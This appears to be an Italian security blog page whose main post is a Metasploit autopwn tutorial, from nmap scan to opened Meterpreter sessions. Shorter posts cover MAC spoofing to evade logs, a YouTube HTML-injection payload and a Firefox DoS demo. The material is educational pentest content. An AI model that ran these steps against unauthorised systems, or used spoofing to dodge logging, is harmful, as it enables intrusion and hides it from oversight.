Automatizzare il processo di PenTest con Metasploit Autopwn
Come detto nel post precedente, Metasploit è un formidabile strumento che consente a tutti gli amministratori di infrastruttura IT di testare i loro sistemi in ambito di sicurezza. Questa operazione talvolta può essere lunga e richiedere qualche giorno.
Per questo motivo ci viene in aiuto una funzione particolare di MSF, questa è Autopwn.
Autopwn tratterà tutte le query di un database precedentemente creato, poi vedremo come, in potenziale bersagli per l'attacco.
Innanzi tutto creiamo il DB e popoliamolo con i risultati otteniti tramite una scansione di NMAP.
msf > db_driver sqlite3
msf > db_create msfdb
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: msfdb
Ora un istanza di quel database è in memoria, ed è proprio su di essa che andremo ad effettuare le prossime operazioni.
Andiamo quindi ad effettuare una semplice scansione con il tool NMAP.
msf > db_nmap 192.168.0.1
Fra i risultati della scansione potremmo ottenere ad esempio;
PORT STATE SERVICE
445/tcp open microsoft-ds
indicando una vulnerabilità al servizio microsoft-ds alla porta 445.
Tramite i parametri di db_autopwn andremo ad ottimizzare la fase di testing sul sistema bersaglio.
Ora lanciate l'attacco.
msf > db_autpwn -p -t -e
alla fine dovremmo ottenere una stringa simile a questa;
...
[*] Calling the vulnerable function...
[*] Command shell session 2 opened (192.168.0.145:47380 -> 192.168.0.106:27700)
Visualizziamo la liste delle sessioni aperte e selezioniamo quale sessione usare.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.0.110:58413 -> 192.168.0.19:16456
2 Meterpreter 192.168.0.110:43719 -> 192.168.0.19:9292
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > [comando]
Manuale metasploit
Probabilmente avrete notato che il blog è in latenza da diverso tempo, la motivazione principale è da attribuire a questo caldo estivo che mi sta letteralmente rallentando. Per smorzare un po questa latenza vi posterò qualcosa che potrebbe tornare utile.
Avrei voluto mostrare qualche caso di uso di Metasploit ma per prima cosa sarebbe meglio mostrare una panoramica complessiva sul framework e il suo funzionamento.
Metasploit fornisce informazioni utili e gli strumenti per penetration tester e ricercatori di sicurezza. Il progetto è stato creato per fornire dettagli sulle tecniche di exploit e per fornire un knowledge base a sviluppatori e professionisti della sicurezza.
Detto questo vi propongo l'ottima guida e un video-tutorial dal sito BackTrack.it .
Ottimizzare il segnale wireless cambiando il canale del router
Dopo la pausa esami, riprende, si spera assiduamente, l’attività del blog.
In un ambiente molto “frequentato” da reti wireless, i router o gli access point potrebbero presentare problemi di segnale e cadute di connessione impreviste. Gli stessi, inoltre, se comunicano alla stessa frequenza, potrebbero rallentare le comunicazioni con le periferiche connesse.
Un aspetto interessante da vedere è la possibilità di cambiare il canale di connessione wireless per migliorare il segnale e ridurre le “interferenze” con gli altri router.
Chiù darknet pi tutti
In questo ultimo periodo nel mondo si sta molto parlando della libertà di espressione e di come alcuni governi stanno cercando di negarla applicando, tramite l'emanazione di leggi censorie.
Diciamo subito in che molti stati, come la Cina e la Birmania, vige un regime dittatoriale che non desidera che informazioni su avvenimenti "governativi" o fatti compromettenti di alti esponenti vengano alla luce e per questo motivo deviano o censurano tutti i media di informazione come emittenti televisive e fanno filtrare dagli ISP solo determinati indirizzi IP.
Ho fatto questa breve premessa per poter introdurre le darknet, ovvero strutture decentralizzate e allo stesso tempo parallele alla internet, aventi una propria gestione e delle proprie strutture. Va vediamola più nel dettaglio.
Modificare il MAC Address in Linux
A volte può essere necessario modificare l'indirizzo MAC delle propria interfaccia di rete. I motivi possono essere i più disparati, come ad esempio;
- aggirare sistemi di riconoscimento MAC;
- fare dello MAC spoofing;
- facendo parte di una rete potremmo ricevere pacchetti destinati al proprietario del MAC originale;
- aggirare i sistemi di "log" che contengono informazioni di che ha provato, o è riuscito
ad accedere ad un sistema. Qui un fake MAC è più che necessario.
Dopo aver visto i motivi che potrebbero spingerci a modificare l'indirizzo MAC, vediamo come eseguire questa operazione in 2 diversi modi.
YouTube HTML Injection Hacked
YouTube si è dimostrato vulnerabile ad attacchi di tipo HTML Injection, a dimostrarlo è stato blog.insecurity.ro che mostra come ci è riuscito.
A quanto sembra la sezione vulnerabile è quella dei commenti, dove è stato possibile iniettare codice HTML Bulletin Board Code;
Per il popup
<script><BODY onLoad=”alert(‘string’);”
ecco il risultato mostrato da insecurity.ro
Firefox sotto scacco DoS
A quando sembra, il manutentore del sito ha.ckers.org si è imbattuto in una serie di errori causati da Firefox, che tuttavia non riportavano sempre il consueto messaggio;
A script on this page may be busy or it may have stopped responding.
Ma a volte l'errore riscontrato riportava messaggi come;
"chrome://noscript/content/main.js: 2149" o
"chrome://global/content/associazioni/general.xml: 0"
Se gli errori fossero dovuti a script anomali, questi potrebbero compromettere la memoria, magari sovrascrivendola con qualcosa di malvagio.
Se qualcuno fosse intenzionato a vivere la sua stessa "esperienza", viene messo a disposizione sul sito una demo per testare il comportamento. Si consiglia di salvare il lavoro prima di provare la demo.
Fonte: ha.ckers
Categorie
- Curiosità (11)
- Giochi (2)
- Hardware (2)
- News (15)
- Sicurezza (22)
- Sistemi operativi (3)
- Software (8)
- Sviluppo (7)
Social
Blogroll
Tag Cloud
Archivi
- agosto 2010 (2)
- luglio 2010 (4)
- giugno 2010 (20)
- maggio 2010 (20)
- aprile 2010 (16)
Ultimi Commenti
- Simone su GIT per il controllo di versione
- Aldo "xoen" Giambelluca su GIT per il controllo di versione
- Alessio Dalla Piazza su Difendersi da attacchi di Arp Poisoning
- Simone su Attacchi ad SSL con MITM
- Alessio Dalla Piazza su Attacchi ad SSL con MITM
Meta
Presenti su
Attribuzione
Questo/a opera è pubblicato sotto una Licenza Creative Commons.